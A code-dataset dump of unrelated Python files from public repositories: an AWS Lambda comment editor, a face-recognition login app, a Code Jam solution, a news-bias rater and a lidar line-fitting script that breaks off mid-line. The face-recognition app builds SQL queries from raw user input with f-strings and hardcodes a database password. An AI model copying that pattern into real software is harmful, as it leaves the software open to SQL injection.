\"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Headers\": \"Content-Type\",\n \"Access-Control-Allow-Methods\": \"OPTIONS,POST,GET\",\n },\n}\n\ncomment_database = None\n\ntry:\n comment_database = os.environ[\"COMMENT_STORAGE_TABLE_NAME\"]\nexcept:\n logger.info(\"Failed Loading Environment Variables\")\n response[\"statusCode\"] = 500\n response[\"body\"] = json.dumps({\"message\": \"Failed Loading Environment Variables\"})\n\n\ndef edit_comment(assetId: str, assetVersionIdAndCommentId: str, event: dict) -> dict:\n \"\"\"\n Checks comment ownership then edits the comment to reflect the changes\n :param assetId: string containing the assetId of the comment\n :param assetVersionIdAndCommentId: string with the asset version id and the unique comment id of the comment\n :param event: Lambda event dictionary\n :returns: dictionary with status code and success info\n \"\"\"\n response = {\"statusCode\": 404, \"message\": \"Record not found\"}\n logger.info(\"Setting Table\")\n logger.info(comment_database)\n table = dynamodb.Table(comment_database)\n logger.info(\"Setting Time Stamp\")\n dtNow = datetime.datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n logger.info(\"current time in ISO8601:\" + dtNow)\n\n item = get_single_comment(assetId, assetVersionIdAndCommentId)\n if item:\n logger.info(item)\n logger.info(\"Validating owner\")\n\n if item[\"commentOwnerID\"] != event[\"requestContext\"][\"authorizer\"][\"jwt\"][\"claims\"][\"sub\"]:\n response[\"statusCode\"] = 401\n response[\"message\"] = \"Unauthorized\"\n return response\n\n try:\n table.update_item(\n Key={\n \"assetId\": assetId,\n \"assetVersionId:commentId\": assetVersionIdAndCommentId,\n },\n UpdateExpression=\"set commentBody=:b, dateEdited=:d\",\n ExpressionAttributeValues={\n \":b\": event[\"body\"][\"commentBody\"],\n \":d\": dtNow,\n },\n )\n except Exception as e:\n logger.error(e)\n response[\"statusCode\"] = 400\n response[\"message\"] = e\n return response\n\n response[\"statusCode\"] = 200\n response[\"message\"] = \"Succeeded\"\n return response\n\n\ndef lambda_handler(event: dict, context: dict) -> dict:\n \"\"\"\n Lambda handler for API calls that try to add a comment\n :param event: Lamdba event dictionary\n :param context: Lambda context disctionary\n :returns: Http response object (statusCode, headers, body)\n \"\"\"\n logger.info(event)\n response = {\n \"statusCode\": 200,\n \"body\": \"\",\n \"headers\": {\n \"Content-Type\": \"application/json\",\n \"Access-Control-Allow-Credentials\": True,\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Headers\": \"Content-Type\",\n \"Access-Control-Allow-Methods\": \"OPTIONS,POST,GET\",\n },\n }\n\n try:\n if isinstance(event[\"body\"], str):\n event[\"body\"] = json.loads(event[\"body\"])\n except Exception as e:\n response[\"statusCode\"] = 400\n response[\"body\"] = {\"message\": e}\n return response\n\n pathParameters = event.get(\"pathParameters\", {})\n logger.info(pathParameters)\n\n try:\n # error if no assetId in api call\n if \"assetId\" not in pathParameters:\n message = \"No assetId in API Call\"\n response[\"statusCode\"] = 400\n response[\"body\"] = json.dumps({\"message\": message})\n return response\n\n split_arr = pathParameters[\"assetVersionId:commentId\"].split(\":\")\n logger.info(\"Validating parameters\")\n (valid, message) = validate(\n {\n \"assetId\": {\"value\": pathParameters[\"assetId\"], \"validator\": \"ID\"},\n \"commentId\": {\"value\": split_arr[1], \"validator\": \"ID\"},\n }\n )\n\n if not valid:\n logger.warning(message)\n response[\"body\"] = json.dumps({\"message\": message})\n response[\"statusCode\"] = 400\n return response\n\n logger.info(\"Trying to get edit comment\")\n # call the edit_comment function if everything is valid\n returned = edit_comment(pathParameters[\"assetId\"], pathParameters[\"assetVersionId:commentId\"], event)\n response[\"statusCode\"] = returned[\"statusCode\"]\n response[\"body\"] = json.dumps({\"message\": returned[\"message\"]})\n logger.info(response)\n return response\n except Exception as e:\n response[\"statusCode\"] = 500\n logger.error(\"Error!\", e.__class__, \"occurred.\")\n try:\n logger.info(e)\n response[\"body\"] = json.dumps({\"message\": str(e)})\n except:\n logger.info(\"Can't Read Error\")\n response[\"body\"] = json.dumps({\"message\": \"An unexpected error occurred while executing the request\"})\n return response\n","repo_name":"awslabs/visual-asset-management-system","sub_path":"backend/backend/handlers/comments/editComment.py","file_name":"editComment.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"61"} +{"seq_id":"40677533365","text":"import os\nimport joblib\ndef get_model():\n model_path = os.environ.get('MODEL_PATH','src/models/best_model_47_5%.pkl')\n if os.path.exists(model_path):\n model_fit = joblib.load(model_path)\n return model_fit\n # else:\n # return {\"error\": \"Model file not found\"}\n else:\n raise FileNotFoundError(f\"Model file not found at {model_path}\")","repo_name":"juliocesarjcrs/data_science_app_expense_control","sub_path":"api/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28431539643","text":"#informe.py\r\n\r\n#Author: Lucas Pangaro\r\n#Mail: Pangaro.lucas@gmail.com\r\n\r\n# import informe\r\n# informe.informe_camion('../Data/camion.csv', '../Data/precios.csv')\r\n\r\n# ..:EJERCICIO 9.8:..\r\nfrom fileparse import parse_csv\r\nimport lote\r\nimport formato_tabla\r\n#%%\r\ndef leer_precios(archivo):\r\n '''Creo un diccionario con los productos y precios de venta del negocio'''\r\n \r\n with open (archivo, 'rt') as file:\r\n precios = parse_csv(file, types=[str,float], has_headers=False)\r\n \r\n #\"precios\" es una lista de tuplas\r\n d = {}\r\n for tupla in precios:\r\n d[tupla[0]] = tupla[1]\r\n \r\n return d\r\n\r\n\r\ndef leer_camion(archivo):\r\n '''\r\n lee un archivo con el contenido de un camion y devuelva \r\n una lista de instancias de Lote\r\n '''\r\n with open (archivo, 'rt') as file:\r\n dic_camion = parse_csv(file, select = ['nombre', 'cajones', 'precio'], types = [str, int, float])\r\n\r\n camion = [ lote.Lote(d['nombre'], d['cajones'], d['precio']) for d in dic_camion]\r\n \r\n \r\n return camion\r\n\r\n\r\ndef hacer_informe(camion, dic_precios):\r\n lista_de_tuplas = []\r\n cambio = 0.0\r\n for s in camion:\r\n cambio = dic_precios[s.nombre] - s.precio\r\n tupla = (s.nombre, s.cajones, s.precio, cambio)\r\n lista_de_tuplas.append(tupla)\r\n \r\n return lista_de_tuplas\r\n\r\n\r\ndef imprimir_informe(data_informe, formateador):\r\n \r\n formateador.encabezado(['Nombre', 'Cantidad', 'Precio', 'Cambio'])\r\n for nombre, cajones, precio, cambio in data_informe:\r\n rowdata = [ nombre, str(cajones), f'{precio:0.2f}', f'{cambio:0.2f}' ]\r\n formateador.fila(rowdata)\r\n\r\n\r\ndef informe_camion(archivo_camion, archivo_precios, fmt = 'txt'):\r\n '''\r\n Crea un informe con la carga de un camión\r\n a partir de archivos camion y precio.\r\n El formato predeterminado de la salida es .txt\r\n Alternativas: .csv o .html\r\n '''\r\n # Lee archivos de datos\r\n camion = leer_camion(archivo_camion)\r\n precios = leer_precios(archivo_precios)\r\n\r\n # Crea la data del informe\r\n data_informe = hacer_informe(camion, precios)\r\n\r\n # Imprime el informe\r\n formateador = formato_tabla.crear_formateador(fmt)\r\n imprimir_informe(data_informe, formateador)\r\n\r\n \r\n#%%\r\ndef main(args):\r\n if len(args) == 4:\r\n informe_camion(args[1], args[2], args[3])\r\n elif len(args) == 3:\r\n informe_camion(args[1], args[2])\r\n else:\r\n raise SystemExit('Uso: %s archivo_camion archivo_precios formato' % args[0])\r\n \r\n#%%\r\nif __name__ == '__main__':\r\n import sys\r\n main(sys.argv)","repo_name":"lpangaro/python-UNSAM","sub_path":"Notas/ejercicios_python/Clase09/informe.py","file_name":"informe.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23574486461","text":"\nimport sys\nimport math\n\nntests = int(sys.stdin.readline())\n\nfor ncase in range(ntests):\n N, M = map(int, sys.stdin.readline().split(' '))\n input_str = '{0} {1}\\n'.format(N, M)\n grid = [['.' for i in range(N)] for j in range(N)]\n orig_grid = [['.' for i in range(N)] for j in range(N)]\n for i in range(M):\n line = sys.stdin.readline()\n input_str += line + '\\n'\n a, r, c = line.split(' ')\n grid[int(r) - 1][int(c) - 1] = a\n orig_grid[int(r) - 1][int(c) - 1] = a\n \n rGrid = [[a in ['x', 'o'] for a in row] for row in grid]\n bGrid = [[a in ['+', 'o'] for a in row] for row in grid]\n\n additions = {}\n\n def logGrid(g = grid):\n print('grid:')\n for r in g:\n print(''.join(r))\n print()\n\n # logGrid()\n\n def addItem(r, c, v):\n other = '+' if v == 'x' else 'x'\n if grid[r][c] == '.':\n grid[r][c] = v\n additions[(r, c)] = v\n elif grid[r][c] == other:\n grid[r][c] = 'o'\n additions[(r, c)] = 'o'\n\n while True:\n # logGrid()\n emptyRow = None\n emptyCol = None\n for i in range(N):\n isEmptyRow = True\n isEmptyCol = True\n for j in range(N):\n if rGrid[i][j]: isEmptyRow = False\n if rGrid[j][i]: isEmptyCol = False\n if isEmptyRow: emptyRow = i\n if isEmptyCol: emptyCol = i\n # print(emptyRow, emptyCol)\n if emptyRow is None: break\n rGrid[emptyRow][emptyCol] = True\n addItem(emptyRow, emptyCol, 'x')\n\n # logGrid()\n\n def distToEdge(r, c):\n return min(N - r - 1, N - c - 1, r, c)\n \n def canPlaceB(r0, c0):\n for r1 in range(N):\n for c1 in range(N):\n if ((r0 + c0 == r1 + c1) or (r0 - c0 == r1 - c1)) and bGrid[r1][c1]: return False\n return True\n\n markedGrid = [[False for c in row] for row in grid]\n\n def tryMark(r, c):\n if 0 <= r < N and 0 <= c < N: markedGrid[r][c] = True\n\n def markLocation(r, c):\n bGrid[r][c] = True\n addItem(r, c, '+')\n for i in range(-N+1, N):\n tryMark(r + i, c + i)\n tryMark(r + i, c - i)\n\n for i in range(N):\n for j in range(N):\n if bGrid[i][j]: markLocation(i, j)\n\n for d in range((N // 2) + 1):\n for i in range(d, N-d):\n for j in range(d, N-d):\n if distToEdge(i, j) != d or markedGrid[i][j]: continue\n markLocation(i, j)\n\n def value(v):\n vals = { '+': 1, 'x': 1, 'o': 2 }\n return 0 if v not in vals else vals[v]\n\n # logGrid()\n\n total = sum(sum(value(a) for a in row) for row in grid)\n\n expected = 2 * N + max(0, N - 2)\n\n '''\n if total != expected:\n print(input_str, file=sys.stderr)\n logGrid(orig_grid)\n logGrid()\n raise BaseException(\"total {0} not the same as expected {1}\".format(total, expected))\n '''\n\n result = '{0} {1}'.format(total, len(additions))\n\n print('Case #{0}: {1}'.format(ncase + 1, result), file=sys.stderr)\n print('Case #{0}: {1}'.format(ncase + 1, result))\n for (r, c), v in sorted(additions.items()):\n print('{0} {1} {2}'.format(v, r + 1, c + 1))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_202/75.py","file_name":"75.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39613113814","text":"from rest_framework import serializers\nfrom rest_framework.relations import PrimaryKeyRelatedField, ManyRelatedField\n\n\nclass ZdSModelSerializer(serializers.ModelSerializer):\n def get_fields(self):\n fields = super().get_fields()\n\n request = self._context.get(\"request\")\n if request is None:\n return fields\n\n expands = request.GET.getlist(\"expand\")\n if expands:\n fields = self._update_expand_fields(fields, expands)\n\n x_data_format = request.META.get(\"HTTP_X_DATA_FORMAT\") or \"Markdown\"\n if hasattr(self.Meta, \"formats\"):\n fields = self._update_format_fields(fields, x_data_format)\n\n return fields\n\n def _update_expand_fields(self, fields, expands):\n assert hasattr(\n self.Meta, \"serializers\"\n ), 'Class {serializer_class} missing \"Meta.serializers\" attribute'.format(\n serializer_class=self.__class__.__name__\n )\n\n dict_serializers = dict()\n for serializer in self.Meta.serializers:\n dict_serializers[serializer.Meta.model] = serializer\n\n for expand in expands:\n field = fields.get(expand)\n args = {}\n current_serializer = None\n\n try:\n if isinstance(field, PrimaryKeyRelatedField):\n current_serializer = dict_serializers[field.queryset.model]\n elif isinstance(field, ManyRelatedField):\n current_serializer = dict_serializers[field.child_relation.queryset.model]\n args = {\"many\": True}\n\n assert (\n current_serializer is not None\n ), \"You cannot expand a field without a serializer of the same model.\"\n except KeyError:\n continue\n\n fields[expand] = current_serializer(**args)\n\n return fields\n\n def _update_format_fields(self, fields, x_data_format=\"Markdown\"):\n assert hasattr(self.Meta, \"formats\"), 'Class {serializer_class} missing \"Meta.formats\" attribute'.format(\n serializer_class=self.__class__.__name__\n )\n\n for current in self.Meta.formats:\n if current != x_data_format:\n fields.pop(self.Meta.formats[current])\n\n return fields\n","repo_name":"zestedesavoir/zds-site","sub_path":"zds/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"61"} +{"seq_id":"7230449898","text":"\nnumvalid = 0\n\nwith open(\"day0201.txt\", \"r\") as f:\n for line in f:\n (nums, letter, pw) = line.split()\n mn,mx = nums.split('-')\n letter = letter[:-1]\n mn = int(mn) - 1 # using 1 index :(\n mx = int(mx) - 1 # using 1 index :(\n if mx < len(pw):\n if pw[mn] == letter and pw[mx] != letter:\n numvalid += 1\n print(f\"{mn}, {mx}, {letter}, {pw}\")\n\n if pw[mn] != letter and pw[mx] == letter:\n numvalid += 1\n print(f\"{mn}, {mx}, {letter}, {pw}\")\n\n\nprint(f\"numvalid: {numvalid}\")\n","repo_name":"jobartucz/AdventOfCode-2020","sub_path":"day0202.py","file_name":"day0202.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16620583601","text":"import cv2\nimport time\nimport face_detection\nimport tqdm\n\n\nif __name__ == \"__main__\":\n num = 1000\n\n for detector in face_detection.available_detectors:\n detector = face_detection.build_detector(\n detector,\n fp16_inference=True\n )\n im = \"images/0_Parade_Parade_0_873.jpg\"\n im = cv2.imread(im)[:, :, ::-1]\n t = time.time()\n for i in tqdm.trange(num):\n dets = detector.detect(im)\n total_time = time.time() - t\n avg_time = total_time / num\n fps = 1 / avg_time\n ms = avg_time * 1000\n print(\n f\"Detector: {detector.__class__.__name__}. Average inference time over image shape: {im.shape} is:\",\n f\"{ms:.2f} ms, fps: {fps:.2f}\")\n","repo_name":"hukkelas/DSFD-Pytorch-Inference","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"61"} +{"seq_id":"37031055318","text":"import asyncio\nimport logging\nfrom enum import Enum\n\nimport aiohttp\nimport anyio\nimport pymorphy2\nfrom async_timeout import timeout\n\nfrom jaundice_rate import adapters, text_tools\nfrom jaundice_rate.adapters.exceptions import ArticleNotFoundError, ResourceIsNotSupportedError\nfrom jaundice_rate.settings import TEST_JAUNDICE_ARTICLE_URLS\nfrom jaundice_rate.utils import calculation_time, read_charged_words\n\nlogger = logging.getLogger(__name__)\n\n\nclass ProcessingStatus(Enum):\n OK = 'OK'\n FETCH_ERROR = 'FETCH_ERROR'\n PARSING_ERROR = 'PARSING_ERROR'\n RESOURCE_IS_NOT_SUPPORTED = 'RESOURCE_IS_NOT_SUPPORTED'\n TIMEOUT = 'TIMEOUT'\n\n\nasync def fetch(session: aiohttp.ClientSession, url: str) -> str:\n async with session.get(url) as response:\n response.raise_for_status()\n return await response.text()\n\n\nasync def process_article(\n morph: pymorphy2.MorphAnalyzer,\n url: str,\n processed_articles: list[tuple],\n charged_words: set[str],\n session: aiohttp.ClientSession,\n) -> None:\n analysis_time = None\n get_analysis_time = None\n\n try:\n async with timeout(5):\n html_article = await fetch(session, url)\n\n sanitizer = adapters.get_sanitizer(url)\n article_text = sanitizer(html_article, True)\n\n try:\n with calculation_time() as get_analysis_time:\n async with timeout(3):\n article_words = await text_tools.split_by_words(morph, article_text)\n rating = await text_tools.calculate_jaundice_rate(article_words, charged_words)\n words_count = len(article_words)\n finally:\n if get_analysis_time is not None:\n analysis_time = get_analysis_time()\n\n except asyncio.exceptions.TimeoutError:\n return processed_articles.append(\n (url, None, None, ProcessingStatus.TIMEOUT.value, analysis_time),\n )\n except aiohttp.ClientError:\n return processed_articles.append(\n (url, None, None, ProcessingStatus.FETCH_ERROR.value, None),\n )\n except ArticleNotFoundError:\n return processed_articles.append(\n (url, None, None, ProcessingStatus.PARSING_ERROR.value, None),\n )\n except ResourceIsNotSupportedError:\n return processed_articles.append(\n (url, None, None, ProcessingStatus.RESOURCE_IS_NOT_SUPPORTED.value, None),\n )\n\n processed_articles.append( # noqa: RET503\n (url, rating, words_count, ProcessingStatus.OK.name, analysis_time),\n )\n\n\nasync def main() -> None:\n logging.basicConfig(level=logging.INFO, format='%(message)s')\n\n morph = pymorphy2.MorphAnalyzer()\n charged_words = await read_charged_words()\n processed_articles = []\n\n async with aiohttp.ClientSession() as session:\n async with anyio.create_task_group() as tg:\n for url in TEST_JAUNDICE_ARTICLE_URLS:\n tg.start_soon(\n process_article,\n morph,\n url,\n processed_articles,\n charged_words,\n session,\n )\n\n for url, rating, words_count, status, analysis_time in processed_articles:\n print( # noqa: T201\n f'{url}\\nСтатус: {status}\\nРейтинг: {rating}\\nКоличество слов: {words_count}',\n )\n logger.info('Analysis time: %s sec.\\n', analysis_time)\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"alexSmkh/jaundice-news-filter","sub_path":"jaundice_rate/jaundice_analysis.py","file_name":"jaundice_analysis.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38557436634","text":"import os.path\r\nimport subprocess\r\nimport tkinter as tk\r\nimport util\r\nimport cv2\r\nfrom PIL import Image,ImageTk\r\nimport datetime\r\nimport os\r\nimport mysql.connector\r\n\r\ndataBase = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"admin\",\r\n database=\"damac\"\r\n)\r\n\r\n# preparing a cursor object\r\ncursorObject = dataBase.cursor()\r\n\r\nclass App:\r\n def __init__(self):\r\n self.main_window = tk.Tk()\r\n self.main_window.geometry('1200x520+350+100')\r\n self.login_button_main_window = util.get_button(self.main_window,\r\n 'login','green',self.login)\r\n self.login_button_main_window.place(x=750,y=300)\r\n self.register_button_main_window = util.get_button(self.main_window,\r\n 'register', 'gray',\r\n self.register_new_user,fg='black')\r\n\r\n self.register_button_main_window.place(x=750, y=400)\r\n\r\n self.webcam_label = util.get_img_label(self.main_window)\r\n\r\n self.webcam_label.place(x=10,y=0,width = 700,height = 500)\r\n self.add_webcam(self.webcam_label)\r\n\r\n self.db_dir = './db'\r\n if not os.path.exists(self.db_dir):\r\n os.mkdir(self.db_dir)\r\n\r\n self.log_path = './log.txt'\r\n def start(self):\r\n self.main_window.mainloop()\r\n\r\n def login(self):\r\n unknown_img_path = './.tmp.jpg'\r\n cv2.imwrite(unknown_img_path,self.most_recent_capture_arr)\r\n output = str(subprocess.check_output(['face_recognition', self.db_dir, unknown_img_path]))\r\n name = output.split(',')[-1][:-5]\r\n print(name)\r\n if name in ['uknown_person','no_persons_found']:\r\n util.msg_box('Error','User not found, Please register or try again')\r\n else:\r\n util.msg_box('Successful Login',f'Welcome back, {name}')\r\n with open(self.log_path,'a') as f:\r\n f.write(f'{name}, {datetime.datetime.now()}\\n')\r\n os.remove(unknown_img_path)\r\n\r\n def register_new_user(self):\r\n self.register_new_user_window = tk.Toplevel(self.main_window)\r\n self.register_new_user_window.geometry('1200x920+370+120')\r\n\r\n self.accept_button_register_new_user_window = util.get_button(self.register_new_user_window,\r\n 'Confirm', 'green', self.confirm_register_new_user)\r\n self.accept_button_register_new_user_window.place(x=750, y=400)\r\n\r\n self.tryagain_button_register_new_user_window = util.get_button(self.register_new_user_window,\r\n 'try again', 'red', self.tryagain_register_new_user)\r\n self.tryagain_button_register_new_user_window.place(x=750, y=500)\r\n\r\n self.capture_label = util.get_img_label(self.register_new_user_window)\r\n\r\n self.capture_label.place(x=10, y=0, width=700, height=500)\r\n\r\n self.add_img_to_label(self.capture_label)\r\n\r\n self.name_input = util.get_entry_text(self.register_new_user_window)\r\n self.name_input.place(x=750,y=90)\r\n\r\n self.name_input_label = util.get_text_label(self.register_new_user_window,'Enter name: ')\r\n self.name_input_label.place(x=750,y=30)\r\n\r\n self.cluster_input = util.get_entry_text(self.register_new_user_window)\r\n self.cluster_input.place(x=750, y=210)\r\n\r\n self.cluster_input_label = util.get_text_label(self.register_new_user_window, 'Enter cluster: ')\r\n self.cluster_input_label.place(x=750, y=150)\r\n\r\n self.villa_input = util.get_entry_text(self.register_new_user_window)\r\n self.villa_input.place(x=750, y=330)\r\n\r\n self.villa_input_label = util.get_text_label(self.register_new_user_window, 'Enter villa number: ')\r\n self.villa_input_label.place(x=750, y=270)\r\n\r\n def confirm_register_new_user(self):\r\n name = self.name_input.get(1.0,\"end-1c\")\r\n cluster = self.cluster_input.get(1.0, \"end-1c\")\r\n villa_number = self.villa_input.get(1.0, \"end-1c\")\r\n\r\n registered = self.user_already_registered(name,cluster,villa_number)\r\n if registered:\r\n\r\n util.msg_box('ERROR','User has already been registered, Please login')\r\n self.register_new_user_window.destroy()\r\n return\r\n\r\n self.add_usertoDB(name,cluster,villa_number)\r\n\r\n cv2.imwrite(os.path.join(self.db_dir,f'{name}.jpg'),self.register_new_user_capture)\r\n\r\n util.msg_box('Success','The user has been registered successfully')\r\n\r\n self.register_new_user_window.destroy()\r\n\r\n def user_already_registered(self,name,cluster,villa_number):\r\n query = f\"SELECT * FROM users where name='{name}' and cluster='{cluster}' and villa_no={villa_number} \"\r\n cursorObject.execute(query)\r\n\r\n myresult = cursorObject.fetchall()\r\n if myresult:\r\n return True\r\n return False\r\n\r\n def add_usertoDB(self,name,cluster,villa_number):\r\n sql = \"INSERT INTO users (name, cluster, villa_no)\\\r\n VALUES (%s, %s, %s)\"\r\n val = (name,cluster,villa_number)\r\n\r\n cursorObject.execute(sql, val)\r\n dataBase.commit()\r\n def tryagain_register_new_user(self):\r\n self.register_new_user_window.destroy()\r\n\r\n def add_img_to_label(self,label):\r\n imgtk = ImageTk.PhotoImage(image=self.most_recent_capture_pil)\r\n\r\n label.imgtk = imgtk\r\n label.configure(image=imgtk)\r\n\r\n self.register_new_user_capture = self.most_recent_capture_arr.copy()\r\n\r\n\r\n def add_webcam(self,label):\r\n if 'cap' not in self.__dict__:\r\n self.cap = cv2.VideoCapture(0)\r\n self._label = label\r\n self.process_webcam()\r\n\r\n def process_webcam(self):\r\n ret ,frame = self.cap.read()\r\n self.most_recent_capture_arr = frame\r\n\r\n img_ = cv2.cvtColor(self.most_recent_capture_arr, cv2.COLOR_BGR2RGB)\r\n self.most_recent_capture_pil = Image.fromarray(img_)\r\n\r\n imgtk = ImageTk.PhotoImage(image=self.most_recent_capture_pil)\r\n\r\n self._label.imgtk = imgtk\r\n self._label.configure(image=imgtk)\r\n self._label.after(20, self.process_webcam)\r\n\r\n\r\nif __name__=='__main__':\r\n app = App()\r\n app.start()\r\n dataBase.close()\r\n","repo_name":"AeroArtz/Face-Recognition-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41090978165","text":"import time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef line_equation(p1, p2):\n slope= (p2[1] - p1[1])/(p2[0] - p1[0])\n intercept= p1[1] - slope* p1[0]\n return [slope, intercept]\n\ndef calcul_dist(line, p):\n return np.abs( ( -line[0]* p[0] + p[1] - line[1] ) / ( np.sqrt( line[0]**2 + 1 ) ) )\n\ndef polarToCartesian(p):\n x = p[1] * np.cos(p[0])\n y = p[1] * np.sin(p[0])\n return np.array([x, y])\n\ndef cartesianToPolar(p):\n rho = np.sqrt(p[0]**2 + p[1]**2)\n theta = np.arctan2(p[1], p[0])\n return np.array([theta, rho])\n\ndef most_distant (points, line):\n d = 0\n k=0\n for i in range(1, points.shape[1]):\n dist = calcul_dist(line, points[:, i])\n if dist > d:\n d = dist\n k = i\n return d, k\n\ndef split(points_cartesian, line, threshold_split, p1, p2):\n d, k = most_distant(points_cartesian, line)\n global p_mosts\n\n if d > threshold_split:\n p_most = points_cartesian[:, k]\n p_mosts = np.vstack([p_mosts, p_most])\n\n points_split_left = points_cartesian[:, :k]\n points_split_right = points_cartesian[:, k:]\n\n line_left = line_equation(p1, p_most)\n line_right = line_equation(p2, p_most)\n\n split(points_split_left, line_left, threshold_split, p1, p_most)\n split(points_split_right, line_right, threshold_split, p_most, p2)\n return 0\n\n\n############################################################### Getting data #############################################################################\nthreshold_split = 0.05\nthreshold_merge = 0.1\nthreshold_noise = 0.5\n\ndata= pd.read_csv('data.csv', sep=';')\nrho = np.transpose(np.array(data.iloc[9: , 0].values))\nincrement = data.iloc[4, 0]\nincrements = np.zeros([rho.shape[0]])\nincrements[0]= data.iloc[2, 0]\n\nfor i in range(1, increments.shape[0]):\n increments[i]= increments[i-1] + increment\npoints = np.vstack([increments, rho])\npoints = points[:, ~np.isnan(points).any(axis=0)]\n\n############################################################## Removing noise ###########################################################################\ninds = []\ni=0\nwhile i < (points.shape[1] - 1):\n j = 1\n while (np.abs(points[1, j+i] - points[1, i+j-1]) < threshold_noise) and j+i < points.shape[1]-1:\n j += 1\n\n if j < 50:\n for k in range(j):\n inds.append(i+k)\n i = i + j\n\npoints = np.delete(points, (inds), axis=1)\n\n\n#########################################################################################################################################################\n##################################################################### split and merge ####################################################################\n##########################################################################################################################################################\n\nstart = time.time()\n\np1 = polarToCartesian(points[:, 0])\np2 = polarToCartesian(points[:, -1])\nline = line_equation(p1, p2)\npoints_cartesian = np.zeros(points.shape)\n\nfor i in range(points.shape[1]):\n points_cartesian[:, i] = polarToCartesian(points[:, i])\n##################################################### Splitting and sorting the resulting points ##########################################################\np_mosts = np.zeros(2)\nsplit(points_cartesian, line, threshold_split, p1, p2)\np_mosts = np.delete(p_mosts, (0), axis=0)\np_mosts = np.vstack([p_mosts, p2])\np_mosts = np.vstack([p1, p_mosts])\n\np_mosts_polar = np.zeros(p_mosts.shape)\nfor i in range(p_mosts.shape[0]):\n p_mosts_polar[i, :] = cartesianToPolar(p_mosts[i, :])\np_mosts_polar = p_mosts_polar[np.argsort(p_mosts_polar[:, 0]), :]\n\np_mosts_cartesian = np.zeros(p_mosts.shape)\nfor i in range(p_mosts.shape[0]):\n p_mosts_cartesian[i, :] = polarToCartesian(p_mosts_polar[i, :])\n\n############################################################# creating the lines and Merging #################################################################\ninds = []\nlines = []\nfor i in range(p_mosts_cartesian.shape[0]-1):\n line = line_equation(p_mosts_cartesian[i, :], p_mosts_cartesian[i + 1, :])\n\n if i > 1:\n if np.abs(np.abs(line[0]) - np.abs(lines[-1][0])) < threshold_merge :\n line = line_equation(p_mosts_cartesian[i-1, :], p_mosts_cartesian[i + 1, :])\n lines[-1] = line\n inds.append(i)\n else:\n lines.append(line)\n else:\n lines.append(line)\np_mosts_cartesian = np.delete(p_mosts_cartesian, (inds), axis=0)\n\n############################################################## Plotting the final lines ######################################################################\nplt.scatter( p_mosts[:, 0] , p_mosts[:, 1] ,c = \"r\", linewidth=2, label='lines_edges')\nplt.scatter(points_cartesian[0, :], points_cartesian[1, :], c = \"g\", linewidth = 0.5, label = 'point cloud')\nfor i in range(p_mosts_cartesian.shape[0] - 1):\n x_range = (p_mosts_cartesian[i, 0], p_mosts_cartesian[i+1, 0])\n plt.plot([x_range[0], x_range[1]], [x_range[0]*lines[i][0] + lines[i][1], x_range[1]*lines[i][0] + lines[i][1]], c = \"r\", linewidth=2)\n plt.title('Split and merge')\n plt.legend()\nplt.show()\n\nend = time.time()\ntime_split = end-start\n\n##########################################################################################################################################################\n##################################################################### line regression ####################################################################\n##########################################################################################################################################################\n\n\ndef line_least_square(p):\n y= p[1, :]\n x= p[0, :]\n mean_x = np.mean(x)\n mean_y = np.mean(y)\n slope = np.dot((x - mean_x), (y - mean_y))/np.dot ((x - mean_x), (x - mean_x))\n intercept = mean_y - slope * mean_x\n return [slope , intercept]\n\ndef mahalanobis_dist (window1 , window2):\n y1 = window1[1, :] - np.mean(window1[1, :])\n x1 = window1[0, :] - np.mean(window1[0, :])\n y2 = window2[1, :] - np.mean(window2[1, :])\n x2 = window2[0, :] - np.mean(window2[0, :])\n\n u1 = np.hstack([x1, y1])\n u2 = np.hstack([x2, y2])\n cov = np.outer(u1, np.transpose(u2))\n dist = np.sqrt( np.dot(np.transpose(u1) , np.dot( np.linalg.inv(cov), u2 ) ))\n return dist\n\nstart = time.time()\n################################################################## fit line in a window ####################################################################\nNf= 7\nwindow = points_cartesian[:, :Nf]\nline = line_least_square(window)\n\n########################################################### Building the line and the fidelity array ######################################################\nlines = [line]\nfidelity_array = []\nfor i in range(1, points_cartesian.shape[1] - Nf-1):\n window1 = points_cartesian[:, i-1 : i + Nf]\n window2 = points_cartesian[:, i-1 + 1 : i + Nf + 1]\n\n lines.append(np.array(line_least_square(window1)))\n fidelity_array.append( mahalanobis_dist(window1, window2) )\n\n################################################################## Clustering and merging lines #############################################################\ni = 0\nj = 1\nplt.scatter(points_cartesian[0, :], points_cartesian[1, :], c = \"g\", linewidth = 0.05, label = 'point cloud')\nwhile i + j < len(fidelity_array):\n j = 1\n if not (np.isnan(fidelity_array[i]) ):\n while not(np.isnan(fidelity_array[i + j]) ):\n if (i + j < len(fidelity_array) - 1):\n j += 1\n else:\n break\n window = points_cartesian[:, i: i + j * Nf]\n line = 